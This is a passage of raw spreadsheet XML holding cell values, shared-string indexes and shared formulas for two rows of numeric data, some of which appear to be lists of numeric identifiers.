      <c r="CG137" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH137" s="104">
        <v>399.0</v>
      </c>
      <c r="CI137" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ137" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK137" s="104">
        <v>0.0</v>
      </c>
      <c r="CL137" s="104">
        <v>0.0</v>
      </c>
      <c r="CM137" s="105">
        <v>11.0</v>
      </c>
      <c r="CN137" s="105">
        <v>4.0</v>
      </c>
      <c r="CO137" s="105">
        <v>4.0</v>
      </c>
      <c r="CP137" s="105">
        <v>4.0</v>
      </c>
      <c r="CQ137" s="105">
        <v>0.0</v>
      </c>
      <c r="CR137" s="105">
        <v>4.0</v>
      </c>
      <c r="CS137" s="105">
        <v>0.0</v>
      </c>
      <c r="CT137" s="105">
        <v>0.0</v>
      </c>
      <c r="CU137" s="105">
        <v>0.0</v>
      </c>
      <c r="CV137" s="105">
        <v>0.0</v>
      </c>
      <c r="CW137" s="105">
        <v>4.0</v>
      </c>
      <c r="CX137" s="105">
        <v>4.0</v>
      </c>
      <c r="CY137" s="105">
        <v>4.0</v>
      </c>
      <c r="CZ137" s="105">
        <v>0.0</v>
      </c>
      <c r="DA137" s="105">
        <v>4.0</v>
      </c>
      <c r="DB137" s="106">
        <f t="shared" si="176"/>
        <v>4</v>
      </c>
      <c r="DC137" s="106">
        <f t="shared" si="177"/>
        <v>4</v>
      </c>
      <c r="DD137" s="106">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="DE137" s="106">
        <f t="shared" si="179"/>
        <v>4</v>
      </c>
      <c r="DF137" s="106">
        <f t="shared" si="180"/>
        <v>4</v>
      </c>
      <c r="DG137" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH137" s="106">
        <f t="shared" si="181"/>
        <v>4</v>
      </c>
      <c r="DI137" s="106">
        <f t="shared" si="182"/>
        <v>4</v>
      </c>
      <c r="DJ137" s="106">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="DK137" s="107">
        <f t="shared" si="219"/>
        <v>0</v>
      </c>
      <c r="DL137" s="106">
        <f t="shared" si="220"/>
        <v>0</v>
      </c>
      <c r="DM137" s="108">
        <v>399.0</v>
      </c>
      <c r="DN137" s="108">
        <v>1.0</v>
      </c>
      <c r="DO137" s="108">
        <v>4.0</v>
      </c>
      <c r="DP137" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ137" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR137" s="108">
        <v>0.0</v>
      </c>
      <c r="DS137" s="108">
        <v>0.0</v>
      </c>
      <c r="DT137" s="108">
        <v>399.0</v>
      </c>
      <c r="DU137" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV137" s="108">
        <f t="shared" si="221"/>
        <v>399</v>
      </c>
      <c r="DW137" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX137" s="108">
        <v>399.0</v>
      </c>
      <c r="DY137" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ137" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA137" s="108">
        <v>0.0</v>
      </c>
      <c r="EB137" s="108">
        <v>0.0</v>
      </c>
      <c r="EC137" s="109">
        <v>12.0</v>
      </c>
      <c r="ED137" s="109">
        <v>4.0</v>
      </c>
      <c r="EE137" s="109">
        <v>4.0</v>
      </c>
      <c r="EF137" s="109">
        <v>4.0</v>
      </c>
      <c r="EG137" s="109">
        <v>0.0</v>
      </c>
      <c r="EH137" s="109">
        <v>4.0</v>
      </c>
      <c r="EI137" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ137" s="109">
        <v>0.0</v>
      </c>
      <c r="EK137" s="109">
        <v>0.0</v>
      </c>
      <c r="EL137" s="109">
        <v>0.0</v>
      </c>
      <c r="EM137" s="109">
        <v>4.0</v>
      </c>
      <c r="EN137" s="109">
        <v>4.0</v>
      </c>
      <c r="EO137" s="109">
        <v>4.0</v>
      </c>
      <c r="EP137" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ137" s="109">
        <v>4.0</v>
      </c>
      <c r="ER137" s="110">
        <f t="shared" si="184"/>
        <v>4</v>
      </c>
      <c r="ES137" s="110">
        <f t="shared" si="185"/>
        <v>4</v>
      </c>
      <c r="ET137" s="110">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="EU137" s="110">
        <f t="shared" si="187"/>
        <v>4</v>
      </c>
      <c r="EV137" s="110">
        <f t="shared" si="188"/>
        <v>4</v>
      </c>
      <c r="EW137" s="110">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="EX137" s="110">
        <f t="shared" si="190"/>
        <v>4</v>
      </c>
      <c r="EY137" s="110">
        <f t="shared" si="191"/>
        <v>4</v>
      </c>
      <c r="EZ137" s="110">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="FA137" s="110">
        <f t="shared" si="222"/>
        <v>0</v>
      </c>
      <c r="FB137" s="110">
        <f t="shared" si="223"/>
        <v>0</v>
      </c>
      <c r="FC137" s="111" t="s">
        <v>2309</v>
      </c>
      <c r="FD137" s="111">
        <v>4.0</v>
      </c>
      <c r="FE137" s="111">
        <v>8.0</v>
      </c>
      <c r="FF137" s="101" t="s">
        <v>2310</v>
      </c>
      <c r="FG137" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FH137" s="111">
        <v>0.0</v>
      </c>
      <c r="FI137" s="111">
        <v>0.0</v>
      </c>
      <c r="FJ137" s="111" t="s">
        <v>2309</v>
      </c>
      <c r="FK137" s="111" t="s">
        <v>2310</v>
      </c>
      <c r="FL137" s="111" t="str">
        <f t="shared" si="216"/>
        <v>399, 2100399, 2002752, 2002749</v>
      </c>
      <c r="FM137" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN137" s="111" t="s">
        <v>2309</v>
      </c>
      <c r="FO137" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP137" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ137" s="111">
        <v>0.0</v>
      </c>
      <c r="FR137" s="111">
        <v>0.0</v>
      </c>
      <c r="FS137" s="112">
        <v>11.0</v>
      </c>
      <c r="FT137" s="112">
        <v>5.0</v>
      </c>
      <c r="FU137" s="112">
        <v>5.0</v>
      </c>
      <c r="FV137" s="112">
        <v>4.0</v>
      </c>
      <c r="FW137" s="112">
        <v>8.0</v>
      </c>
      <c r="FX137" s="112">
        <v>8.0</v>
      </c>
      <c r="FY137" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ137" s="112">
        <v>0.0</v>
      </c>
      <c r="GA137" s="112">
        <v>0.0</v>
      </c>
      <c r="GB137" s="112">
        <v>0.0</v>
      </c>
      <c r="GC137" s="112">
        <v>4.0</v>
      </c>
      <c r="GD137" s="112">
        <v>4.0</v>
      </c>
      <c r="GE137" s="112">
        <v>4.0</v>
      </c>
      <c r="GF137" s="112">
        <v>0.0</v>
      </c>
      <c r="GG137" s="112">
        <v>4.0</v>
      </c>
      <c r="GH137" s="113">
        <f t="shared" si="193"/>
        <v>5</v>
      </c>
      <c r="GI137" s="113">
        <f t="shared" si="194"/>
        <v>4</v>
      </c>
      <c r="GJ137" s="113">
        <f t="shared" si="195"/>
        <v>0</v>
      </c>
      <c r="GK137" s="113">
        <f t="shared" si="196"/>
        <v>5</v>
      </c>
      <c r="GL137" s="113">
        <f t="shared" si="197"/>
        <v>4</v>
      </c>
      <c r="GM137" s="113">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="GN137" s="113">
        <f t="shared" si="199"/>
        <v>8</v>
      </c>
      <c r="GO137" s="113">
        <f t="shared" si="200"/>
        <v>4</v>
      </c>
      <c r="GP137" s="113">
        <f t="shared" si="201"/>
        <v>0</v>
      </c>
      <c r="GQ137" s="114">
        <f t="shared" si="224"/>
        <v>0</v>
      </c>
      <c r="GR137" s="113">
        <f t="shared" si="225"/>
        <v>0</v>
      </c>
      <c r="GS137" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT137" s="94" t="s">
        <v>2311</v>
      </c>
      <c r="GU137" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV137" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW137" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX137" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY137" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ137" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA137" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB137" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC137" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD137" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE137" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF137" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG137" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH137" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI137" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ137" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK137" s="93" t="str">
        <f t="shared" si="51"/>
        <v>NO</v>
      </c>
      <c r="HL137" s="93">
        <v>11.0</v>
      </c>
      <c r="HM137" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN137" s="93">
        <v>0.0</v>
      </c>
      <c r="HO137" s="93">
        <v>0.0</v>
      </c>
      <c r="HP137" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ137" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR137" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS137" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT137" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU137" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV137" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW137" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX137" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY137" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ137" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA137" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB137" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC137" s="120" t="str">
        <f t="shared" si="228"/>
        <v>-</v>
      </c>
      <c r="ID137" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE137" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF137" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG137" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH137" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II137" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ137" s="98" t="str">
        <f t="shared" si="56"/>
        <v>NO</v>
      </c>
      <c r="IK137" s="99">
        <v>12.0</v>
      </c>
      <c r="IL137" s="99">
        <v>0.0</v>
      </c>
      <c r="IM137" s="121">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="IN137" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO137" s="98">
        <v>0.0</v>
      </c>
      <c r="IP137" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ137" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR137" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS137" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT137" s="127"/>
      <c r="IU137" s="127"/>
      <c r="IV137" s="127"/>
      <c r="IW137" s="127"/>
      <c r="IX137" s="127"/>
      <c r="IY137" s="127"/>
      <c r="IZ137" s="127"/>
      <c r="JA137" s="127"/>
      <c r="JB137" s="127"/>
      <c r="JC137" s="127"/>
      <c r="JD137" s="127"/>
      <c r="JE137" s="127"/>
      <c r="JF137" s="127"/>
      <c r="JG137" s="127"/>
      <c r="JH137" s="127"/>
      <c r="JI137" s="127"/>
      <c r="JJ137" s="127"/>
      <c r="JK137" s="127"/>
      <c r="JL137" s="127"/>
      <c r="JM137" s="127"/>
      <c r="JN137" s="127"/>
      <c r="JO137" s="127"/>
      <c r="JP137" s="127"/>
      <c r="JQ137" s="127"/>
      <c r="JR137" s="127"/>
      <c r="JS137" s="127"/>
      <c r="JT137" s="127"/>
      <c r="JU137" s="127"/>
      <c r="JV137" s="127"/>
      <c r="JW137" s="127"/>
      <c r="JX137" s="127"/>
      <c r="JY137" s="127"/>
      <c r="JZ137" s="127"/>
      <c r="KA137" s="127"/>
      <c r="KB137" s="127"/>
      <c r="KC137" s="127"/>
      <c r="KD137" s="127"/>
      <c r="KE137" s="127"/>
      <c r="KF137" s="127"/>
      <c r="KG137" s="127"/>
      <c r="KH137" s="127"/>
      <c r="KI137" s="127"/>
      <c r="KJ137" s="127"/>
      <c r="KK137" s="127"/>
      <c r="KL137" s="127"/>
      <c r="KM137" s="127"/>
      <c r="KN137" s="127"/>
      <c r="KO137" s="127"/>
      <c r="KP137" s="127"/>
      <c r="KQ137" s="127"/>
      <c r="KR137" s="127"/>
      <c r="KS137" s="127"/>
      <c r="KT137" s="127"/>
      <c r="KU137" s="127"/>
      <c r="KV137" s="127"/>
      <c r="KW137" s="127"/>
      <c r="KX137" s="127"/>
      <c r="KY137" s="127"/>
      <c r="KZ137" s="127"/>
      <c r="LA137" s="127"/>
      <c r="LB137" s="127"/>
      <c r="LC137" s="127"/>
      <c r="LD137" s="127"/>
      <c r="LE137" s="127"/>
      <c r="LF137" s="127"/>
      <c r="LG137" s="127"/>
      <c r="LH137" s="127"/>
      <c r="LI137" s="127"/>
      <c r="LJ137" s="127"/>
      <c r="LK137" s="127"/>
      <c r="LL137" s="127"/>
      <c r="LM137" s="127"/>
      <c r="LN137" s="127"/>
      <c r="LO137" s="127"/>
      <c r="LP137" s="127"/>
      <c r="LQ137" s="127"/>
      <c r="LR137" s="127"/>
      <c r="LS137" s="127"/>
      <c r="LT137" s="127"/>
      <c r="LU137" s="127"/>
      <c r="LV137" s="127"/>
      <c r="LW137" s="127"/>
      <c r="LX137" s="127"/>
      <c r="LY137" s="127"/>
      <c r="LZ137" s="127"/>
      <c r="MA137" s="127"/>
      <c r="MB137" s="127"/>
      <c r="MC137" s="127"/>
      <c r="MD137" s="127"/>
      <c r="ME137" s="127"/>
      <c r="MF137" s="127"/>
      <c r="MG137" s="127"/>
      <c r="MH137" s="127"/>
      <c r="MI137" s="127"/>
      <c r="MJ137" s="127"/>
      <c r="MK137" s="127"/>
      <c r="ML137" s="127"/>
      <c r="MM137" s="127"/>
      <c r="MN137" s="127"/>
      <c r="MO137" s="127"/>
      <c r="MP137" s="127"/>
      <c r="MQ137" s="127"/>
      <c r="MR137" s="127"/>
      <c r="MS137" s="127"/>
      <c r="MT137" s="127"/>
      <c r="MU137" s="127"/>
      <c r="MV137" s="127"/>
      <c r="MW137" s="127"/>
      <c r="MX137" s="127"/>
      <c r="MY137" s="127"/>
      <c r="MZ137" s="127"/>
      <c r="NA137" s="127"/>
      <c r="NB137" s="127"/>
      <c r="NC137" s="127"/>
      <c r="ND137" s="127"/>
      <c r="NE137" s="127"/>
      <c r="NF137" s="127"/>
      <c r="NG137" s="127"/>
      <c r="NH137" s="127"/>
      <c r="NI137" s="127"/>
      <c r="NJ137" s="127"/>
      <c r="NK137" s="127"/>
      <c r="NL137" s="127"/>
      <c r="NM137" s="127"/>
      <c r="NN137" s="127"/>
      <c r="NO137" s="127"/>
      <c r="NP137" s="127"/>
      <c r="NQ137" s="127"/>
      <c r="NR137" s="127"/>
      <c r="NS137" s="127"/>
      <c r="NT137" s="127"/>
      <c r="NU137" s="127"/>
      <c r="NV137" s="127"/>
      <c r="NW137" s="127"/>
      <c r="NX137" s="127"/>
      <c r="NY137" s="127"/>
    </row>
    <row r="138" ht="153.75" customHeight="1">
      <c r="A138" s="173"/>
      <c r="B138" s="146" t="s">
        <v>951</v>
      </c>
      <c r="C138" s="90" t="s">
        <v>209</v>
      </c>
      <c r="D138" s="90" t="s">
        <v>952</v>
      </c>
      <c r="E138" s="90" t="s">
        <v>2300</v>
      </c>
      <c r="F138" s="90" t="s">
        <v>2301</v>
      </c>
      <c r="G138" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H138" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I138" s="92" t="s">
        <v>2312</v>
      </c>
      <c r="J138" s="92" t="s">
        <v>2313</v>
      </c>
      <c r="K138" s="92" t="s">
        <v>2314</v>
      </c>
      <c r="L138" s="93" t="s">
        <v>317</v>
      </c>
      <c r="M138" s="93">
        <v>90.0</v>
      </c>
      <c r="N138" s="93">
        <v>2.0</v>
      </c>
      <c r="O138" s="93">
        <v>0.0</v>
      </c>
      <c r="P138" s="93">
        <v>2.0</v>
      </c>
      <c r="Q138" s="93">
        <f t="shared" si="204"/>
        <v>2</v>
      </c>
      <c r="R138" s="93">
        <v>2.0</v>
      </c>
      <c r="S138" s="93">
        <v>0.0</v>
      </c>
      <c r="T138" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U138" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V138" s="126" t="s">
        <v>2315</v>
      </c>
      <c r="W138" s="96" t="s">
        <v>2316</v>
      </c>
      <c r="X138" s="132" t="s">
        <v>2317</v>
      </c>
      <c r="Y138" s="126" t="s">
        <v>2318</v>
      </c>
      <c r="Z138" s="132" t="s">
        <v>2307</v>
      </c>
      <c r="AA138" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB138" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC138" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD138" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE138" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF138" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG138" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH138" s="99" t="s">
        <v>2319</v>
      </c>
      <c r="AI138" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ138" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK138" s="100">
        <v>1917.0</v>
      </c>
      <c r="AL138" s="100">
        <v>1.0</v>
      </c>
      <c r="AM138" s="100">
        <v>4.0</v>
      </c>
      <c r="AN138" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO138" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP138" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ138" s="100">
        <v>4.0</v>
      </c>
      <c r="AR138" s="100">
        <v>1917.0</v>
      </c>
      <c r="AS138" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT138" s="100">
        <f t="shared" si="227"/>
        <v>1917</v>
      </c>
      <c r="AU138" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV138" s="100">
        <v>1917.0</v>
      </c>
      <c r="AW138" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX138" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY138" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ138" s="100">
        <v>0.0</v>
      </c>
      <c r="BA138" s="102">
        <v>90.0</v>
      </c>
      <c r="BB138" s="102">
        <v>1.0</v>
      </c>
      <c r="BC138" s="102">
        <v>4.0</v>
      </c>
      <c r="BD138" s="102">
        <v>4.0</v>
      </c>
      <c r="BE138" s="102">
        <v>0.0</v>
      </c>
      <c r="BF138" s="102">
        <v>0.0</v>
      </c>
      <c r="BG138" s="102">
        <v>0.0</v>
      </c>
      <c r="BH138" s="102">
        <v>0.0</v>
      </c>
      <c r="BI138" s="102">
        <v>1.0</v>
      </c>
      <c r="BJ138" s="102">
        <v>4.0</v>
      </c>
      <c r="BK138" s="102">
        <v>4.0</v>
      </c>
      <c r="BL138" s="103">
        <f t="shared" si="167"/>
        <v>0.5</v>
      </c>
      <c r="BM138" s="103">
        <f t="shared" si="168"/>
        <v>0.5</v>
      </c>
      <c r="BN138" s="103">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="BO138" s="103">
        <f t="shared" si="170"/>
        <v>2</v>
      </c>
      <c r="BP138" s="103">
        <f t="shared" si="171"/>
        <v>2</v>
      </c>
      <c r="BQ138" s="103">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="BR138" s="103">
        <f t="shared" si="173"/>
        <v>2</v>
      </c>
      <c r="BS138" s="103">
        <f t="shared" si="174"/>
        <v>2</v>
      </c>
      <c r="BT138" s="103">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="BU138" s="103">
        <f t="shared" si="217"/>
        <v>0</v>
      </c>
      <c r="BV138" s="103">
        <f t="shared" si="218"/>
        <v>0</v>
      </c>
      <c r="BW138" s="104" t="s">
        <v>2320</v>
      </c>
      <c r="BX138" s="104">
        <v>4.0</v>
      </c>
      <c r="BY138" s="104">
        <v>7.0</v>
      </c>
      <c r="BZ138" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA138" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB138" s="104">
        <v>4.0</v>
      </c>
      <c r="CC138" s="104">
        <v>7.0</v>
      </c>
      <c r="CD138" s="104">
        <v>1917.0</v>
      </c>
      <c r="CE138" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF138" s="104">
        <f t="shared" si="215"/>
        <v>1917</v>
      </c>
      <c r="CG138" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH138" s="104">
        <v>1917.0</v>
      </c>
      <c r="CI138" s="104" t="s">
        <v>2321</v>
      </c>
      <c r="CJ138" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK138" s="104">
        <v>3.0</v>
      </c>
      <c r="CL138" s="104">
        <v>3.0</v>
      </c>
      <c r="CM138" s="105">
        <v>85.0</v>
      </c>
      <c r="CN138" s="105">
        <v>3.0</v>
      </c>
      <c r="CO138" s="105">
        <v>7.0</v>
      </c>
      <c r="CP138" s="105">
        <v>4.0</v>
      </c>
      <c r="CQ138" s="105">
        <v>3.0</v>
      </c>
      <c r="CR138" s="105">
        <v>7.0</v>
      </c>
      <c r="CS138" s="105">
        <v>2.0</v>
      </c>
      <c r="CT138" s="105">
        <v>0.0</v>
      </c>
      <c r="CU138" s="105">
        <v>2.0</v>
      </c>
      <c r="CV138" s="105">
        <v>2.0</v>
      </c>
      <c r="CW138" s="105">
        <v>3.0</v>
      </c>
      <c r="CX138" s="105">
        <v>7.0</v>
      </c>
      <c r="CY138" s="105">
        <v>4.0</v>
      </c>
      <c r="CZ138" s="105">
        <v>3.0</v>
      </c>
      <c r="DA138" s="105">
        <v>7.0</v>
      </c>
      <c r="DB138" s="106">
        <f t="shared" si="176"/>
        <v>1.5</v>
      </c>
      <c r="DC138" s="106">
        <f t="shared" si="177"/>
        <v>1.5</v>
      </c>
      <c r="DD138" s="106">
        <f t="shared" si="178"/>
        <v>1</v>
      </c>
      <c r="DE138" s="106">
        <f t="shared" si="179"/>
        <v>3.5</v>
      </c>
      <c r="DF138" s="106">
        <f t="shared" si="180"/>
        <v>3.5</v>
      </c>
      <c r="DG138" s="106">
        <f t="shared" si="20"/>
        <v>1</v>
      </c>
      <c r="DH138" s="106">
        <f t="shared" si="181"/>
        <v>3.5</v>
      </c>
      <c r="DI138" s="106">
        <f t="shared" si="182"/>
        <v>3.5</v>
      </c>
      <c r="DJ138" s="106">
        <f t="shared" si="183"/>
        <v>1</v>
      </c>
      <c r="DK138" s="107">
        <f t="shared" si="219"/>
        <v>1</v>
      </c>
      <c r="DL138" s="106">
        <f t="shared" si="220"/>
        <v>1</v>
      </c>
      <c r="DM138" s="108" t="s">
        <v>2322</v>
      </c>
      <c r="DN138" s="108">
        <v>6.0</v>
      </c>
      <c r="DO138" s="108">
        <v>12.0</v>
      </c>
      <c r="DP138" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ138" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR138" s="108">
        <v>0.0</v>
      </c>
      <c r="DS138" s="108">
        <v>0.0</v>
      </c>
      <c r="DT138" s="108" t="s">
        <v>2323</v>
      </c>
      <c r="DU138" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV138" s="108" t="str">
        <f t="shared" si="221"/>
        <v>24303, 1917, 15935</v>
      </c>
      <c r="DW138" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX138" s="108" t="s">
        <v>2323</v>
      </c>
      <c r="DY138" s="108" t="s">
        <v>2324</v>
      </c>
      <c r="DZ138" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA138" s="108">
        <v>3.0</v>
      </c>
      <c r="EB138" s="108">
        <v>3.0</v>
      </c>
      <c r="EC138" s="109">
        <v>90.0</v>
      </c>
      <c r="ED138" s="109">
        <v>7.0</v>
      </c>
      <c r="EE138" s="109">
        <v>12.0</v>
      </c>
      <c r="EF138" s="109">
        <v>9.0</v>
      </c>
      <c r="EG138" s="109">
        <v>3.0</v>
      </c>
      <c r="EH138" s="109">
        <v>12.0</v>
      </c>
      <c r="EI138" s="109">
        <v>2.0</v>
      </c>
      <c r="EJ138" s="109">
        <v>0.0</v>
      </c>
      <c r="EK138" s="109">
        <v>2.0</v>
      </c>
      <c r="EL138" s="109">
        <v>2.0</v>
      </c>
      <c r="EM138" s="109">
        <v>7.0</v>
      </c>
      <c r="EN138" s="109">
        <v>12.0</v>
      </c>
      <c r="EO138" s="109">
        <v>9.0</v>
      </c>
      <c r="EP138" s="109">
        <v>3.0</v>
      </c>
      <c r="EQ138" s="109">
        <v>12.0</v>
      </c>
      <c r="ER138" s="110">
        <f t="shared" si="184"/>
        <v>3.5</v>
      </c>
      <c r="ES138" s="110">
        <f t="shared" si="185"/>
        <v>3.5</v>
      </c>
      <c r="ET138" s="110">
        <f t="shared" si="186"/>
        <v>1</v>
      </c>
      <c r="EU138" s="110">
        <f t="shared" si="187"/>
        <v>6</v>
      </c>
      <c r="EV138" s="110">
        <f t="shared" si="188"/>
        <v>6</v>
      </c>
      <c r="EW138" s="110">
        <f t="shared" si="189"/>
        <v>1</v>
      </c>
      <c r="EX138" s="110">
        <f t="shared" si="190"/>
        <v>6</v>
      </c>
      <c r="EY138" s="110">
        <f t="shared" si="191"/>
        <v>6</v>
      </c>
      <c r="EZ138" s="110">
        <f t="shared" si="192"/>
        <v>1</v>
      </c>
      <c r="FA138" s="110">
        <f t="shared" si="222"/>
        <v>1</v>
      </c>
      <c r="FB138" s="110">
        <f t="shared" si="223"/>
        <v>1</v>
      </c>
      <c r="FC138" s="111" t="s">
        <v>2325</v>
      </c>
      <c r="FD138" s="111">
        <v>14.0</v>
      </c>
      <c r="FE138" s="111">
        <v>87.0</v>
      </c>
      <c r="FF138" s="101" t="s">
        <v>2326</v>
      </c>
      <c r="FG138" s="111" t="s">
        <v>2327</v>
      </c>
      <c r="FH138" s="111">
        <v>9.0</v>
      </c>
      <c r="FI138" s="111">
        <v>15.0</v>
      </c>
      <c r="FJ138" s="111" t="s">
        <v>2328</v>
      </c>
      <c r="FK138" s="111" t="s">
        <v>2329</v>
      </c>
      <c r="FL138" s="111" t="str">
        <f t="shared" si="216"/>
        <v>1917, 15935, 2100527, 2002749, 2101620, 2002752, 2001117, 2101917, 2101200
</v>
      </c>
      <c r="FM138" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN138" s="111" t="s">
        <v>2328</v>
      </c>
      <c r="FO138" s="111" t="s">
        <v>2330</v>
      </c>
      <c r="FP138" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ138" s="111">
        <v>5.0</v>
      </c>
      <c r="FR138" s="111">
        <v>5.0</v>
      </c>
      <c r="FS138" s="112">
        <v>85.0</v>
      </c>
      <c r="FT138" s="112">
        <v>21.0</v>
      </c>
      <c r="FU138" s="112">
        <v>29.0</v>
      </c>
      <c r="FV138" s="112">
        <v>9.0</v>
      </c>
      <c r="FW138" s="112">
        <v>78.0</v>
      </c>
      <c r="FX138" s="112">
        <v>79.0</v>
      </c>
      <c r="FY138" s="112">
        <v>2.0</v>
      </c>
      <c r="FZ138" s="112">
        <v>0.0</v>
      </c>
      <c r="GA138" s="112">
        <v>2.0</v>
      </c>
      <c r="GB138" s="112">
        <v>2.0</v>
      </c>
      <c r="GC138" s="112">
        <v>7.0</v>
      </c>
      <c r="GD138" s="112">
        <v>14.0</v>
      </c>
      <c r="GE138" s="112">
        <v>9.0</v>
      </c>
      <c r="GF138" s="112">
        <v>6.0</v>
      </c>
      <c r="GG138" s="112">
        <v>15.0</v>
      </c>
      <c r="GH138" s="113">
        <f t="shared" si="193"/>
        <v>10.5</v>
      </c>
      <c r="GI138" s="113">
        <f t="shared" si="194"/>
        <v>3.5</v>
      </c>
      <c r="GJ138" s="113">
        <f t="shared" si="195"/>
        <v>1</v>
      </c>
      <c r="GK138" s="113">
        <f t="shared" si="196"/>
        <v>14.5</v>
      </c>
      <c r="GL138" s="113">
        <f t="shared" si="197"/>
        <v>7</v>
      </c>
      <c r="GM138" s="113">
        <f t="shared" si="198"/>
        <v>1</v>
      </c>
      <c r="GN138" s="113">
        <f t="shared" si="199"/>
        <v>39.5</v>
      </c>
      <c r="GO138" s="113">
        <f t="shared" si="200"/>
        <v>7.5</v>
      </c>
      <c r="GP138" s="113">
        <f t="shared" si="201"/>
        <v>1</v>
      </c>
      <c r="GQ138" s="114">
        <f t="shared" si="224"/>
        <v>1</v>
      </c>
      <c r="GR138" s="113">
        <f t="shared" si="225"/>
        <v>1</v>
      </c>
      <c r="GS138" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT138" s="94" t="s">
        <v>2331</v>
      </c>
